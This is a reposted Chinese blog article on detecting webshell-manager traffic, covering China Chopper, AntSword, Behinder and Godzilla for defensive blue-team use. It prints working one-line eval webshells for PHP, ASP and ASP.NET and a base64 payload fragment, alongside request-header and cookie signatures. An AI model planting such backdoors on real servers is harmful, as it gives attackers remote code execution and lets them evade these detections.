Webshell工具的流量特征分析

最新推荐文章于 2024-05-02 14:26:53 发布
最新推荐文章于 2024-05-02 14:26:53 发布
阅读量347 收藏 4
点赞数
文章标签: php 开发语言
原文链接:https://blog.csdn.net/qq_53577336/article/details/125048353
版权

0x00 前言

使用各种的shell工具获取到目标权限,即可进行数据操作,今天来简要分析一下目前常使用的各类shell管理工具的流量特诊,帮助蓝队同学在风险识别上快速初值

0x01 菜刀流量分析

payload特征:
PHP: <?php @eval($_POST['caidao']);?>

ASP: <%eval request(“caidao”)%

ASP.NET: <%@ Page
Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>

数据包流量特征:
1,请求包中:ua头为百度,火狐
2,请求体中存在eavl,base64等特征字符
3,请求体中传递的payload为base64编码,并且存在固定的QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

4,存在&z0 z1 z2 z3


 

0x02 蚁剑流量分析

payload特征:
Php中使用assert,eval执行,
asp 使用eval
在jsp使用的是Java类加载(ClassLoader),同时会带有base64编码解码等字符特征

 


数据包流量特征:
使用普通的一句话都存在以下特征:
每个请求体都存在@ini_set(“display_errors”, “0”);@set_time_limit(0)开头。并且后面存在base64等字符
响应包的结果返回格式为:
随机数
响应内容
随机数

使用base64加密的payload,数据包存在以下base加密的eval命令执行,数据包的payload内容存在几个分段内容,分别都使用base加密,解密后可以看到相关的路径,命令等
响应包的结果返回格式为:
随机数
编码后的结果
随机数

 

 


0x03 冰蝎流量分析

paylaod分析:
php在代码中同样会存在eval或assert等字符特征


在aps中会在for循环进行一段异或处理

 

 在jsp中则利用java的反射,所以会存在ClassLoader,getClass().getClassLoader()等字符特征

 

冰蝎2.0流量特征:
第一阶段请求中返回包状态码为200,返回内容必定是16位的密钥
请求包存在:Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2

 

建立连接后的cookie存在特征字符
所有请求 Cookie的格式都为: Cookie: PHPSESSID=; path=/;

 

冰蝎3.0流量特征:
请求包中content-length 为5740或5720(可能会根据Java版本而改变)
每一个请求头中存在
Pragma: no-cache,Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.9

 


0x04 哥斯拉流量特征

payload特征:
jsp会出现xc,pass字符和Java反射(ClassLoader,getClass().getClassLoader()),base64加解码等特征
php,asp则为普通的一句话木马

哥斯拉流量分析:
作为参考:
所有请求中Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
所有响应中Cache-Control: no-store, no-cache, must-revalidate,
同时在所有请求中Cookie中后面都存在;特征

 

参考:https://www.freebuf.com/articles/web/324622.html
————————————————
版权声明:本文为CSDN博主「告白热」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_53577336/article/details/125048353

小趴菜要上进
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
强大的webshell管理工具-哥斯拉
12-27
只有适合自己的工具,没有好坏之分,拿走不谢。
中国蚁剑 webshell工具
08-12
中国蚁剑
Webshell工具流量特征分析(菜刀,蚁剑,冰蝎,哥斯拉)
热门推荐
告白的博客
05-31 2万+
0x00 前言 使用各种的shell工具获取到目标权限,即可进行数据操作,今天来简要分析一下目前常使用的各类shell管理工具流量特诊,帮助蓝队同学在风险识别上快速初值 0x01 中国菜刀流量分析 0x02 ......
webshell管理工具及其流量特征分析
Goodric的博客
07-22 1366
—对常见四款webshell进行分析,对工具连接流量有个基本认识。——
常见的webshell流量特征和检测思路
weixin_45585955的博客
04-11 5541
所以分析如上:该流量WebShell链接流量的第一段链接流量,其中特征主要在i=A&z0=GB2312,菜刀链接JSP木马时,第一个参数定义操作,其中参数值为A-Q,如i=A,第二个参数指定编码,其参数值为编码,如z0=GB2312,有时候z0后面还会接着又z1=、z2=参数用来加入攻击载荷。最后传给cmd的这些流量字符中有自己的特征,1、都是系统命令;2、必须以分号结尾;至此,冰蝎成为了一个完美的开箱即用的工具,本体内存马免杀,流量免杀,功能齐全,兼容性好,在连续几年的攻防演练中,成为最热门的工具
WEBSHELL管理工具流量特征——基础篇
ALLEN'Blog
01-17 1654
今天给大家带来了WEBSHELL管理工具流量特征基础篇,简单介绍了菜刀和蚁剑这两个比较简单的流量特征,之后也会给大家带来别的WEBSHELL管理工具流量分析,如果夏欢本文希望可以一键三连支持一下。
(菜刀,蚁剑,冰蝎,哥斯拉)流量特征分析总结
weixin_54603520的博客
05-15 3577
在红蓝攻防的过程中,webshell工具流量特征分析一直时蓝队成员需要关注的重点。
流量数据特征相关与攻击
lijieling123的博客
04-01 3733
数据包 根据网络协议的类型,数据包有不同的格式。数据包通常由两部分组成:数据包报头和它的有效负载 报头负责引导包在网络中传输,并标记包的源信息。在许多数据收集方法中,报头对于识别和过滤数据包变得很重要。一些基于报头的方法,根据报头中包含的IP地址、端口和协议将数据包分类为多个流。有效负载包含在通信各方之间交换的数据,尽管其中一些数据可以被加密 libpcap函数库提供了收集数据包流的所有内容的功能 网络流量的最小传输单元是一个包,每个包包括一个或多个报头和一个有效负载。例如,超文本传输协议(HTTP)包包
WebShell工具特征流量分析合集
爱吃仡坨的Blog
10-25 1491
通过编码的数据包1特征,发现是URL编码(BP会自动对其解码显示)还可以通过解码网站对其进行解码,之后分析数据包特征如下图,发现通过蚁剑终端传参之后得到的响应包任然是明文的。
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
kingkong:解密哥斯拉webshell管理工具流量
04-16
解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员...
webshell客户端流量特征
buffedon的博客
07-14 4678
webshell客户端流量特征概述:1. 冰蝎2. 中国菜刀2011,2014版本2016版本3. Cknife4. 蚁剑5. 哥斯拉 webshell客户端 用于webshell后门和攻击者之间的通信程序,我们可以通过webshell客户端的流量来判断服务器上是否存在Webshell后门。 概述: 中国菜刀:流量特征比较明显,2011,2014版本中,流量中有的php代码,asp代码是明文形式,jsp代码有固定格式,容易被检测出来。2016版本隐蔽性增强,对php,asp代码增加了混淆,还对ASP代码进行
WireShark流量分析(中国菜刀,webshell
oJiuJieZhong的博客
02-12 4075
首先拿到这个流量包,还是先对整个包中的帧进行初步的查看,发现为大量的TCP数据帧和HTTP数据帧。 网络攻击一般来自于web,是web那就一定有http,接下来对http进行筛选 发现为大量的GET请求,GET请求在实质性的破坏上比POST请求的破坏性小,那接下来再进行对POST请求的筛选。 发现一个很特殊的数据帧,在访问xiaoma.php,并且一般用户是不会访问到upload文件夹的,接下来对此IP进行筛选,方便查看。 攻击者通过提前上传一个webshell文件(xiaoma.php),接下来通
菜刀、冰蝎、蚁剑、哥斯拉的流量特征
eternitymd的博客
04-29 1万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHPWebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0])),(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
菜刀webshell特征分析
博客地址 www.sec0nd.top
08-01 1366
Webshell是hacker经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。hacker通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。有个想法,看看他这个工具的原理,再分析一下菜刀的特征。我用的最多的就是菜刀,蚁剑安装不上,后面有机会再分析。......
常见WebShell客户端的流量特征及检测思路
合天网安学院
05-28 8940
01概述开始之前先明确什么是webshell客户端?先问个问题,什么是客户端,什么是服务端?很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果已经种了后门,...
jsp写的webshell
wahahams123的专栏
10-28 5749
/** WEBSHELL.JSP** Author: lovehacker* E-mail: [email protected]** 使用方法: * ]http://victim/webshell.jsp?[options]* options:* action=piped&remoteHost=&remotePort=&myIp=&myPort=* action=tunnel&remot
Web】CTFSHOW 中期测评刷题记录(1)
最新发布
uuzeray的博客
05-02 1727
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
webshell流量特征
07-14
Webshell流量特征包括: 1. 频繁的HTTP请求 2. 异常的请求方法(如:PUT,DELETE) 3. 异常的请求参数 4. 动态生成的URL 5. 基于Base64编码的数据传输 6. 对系统命令执行的请求 7. 频繁的404错误请求 以上特征可以帮助识别Webshell流量,但不能确保100%准确。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值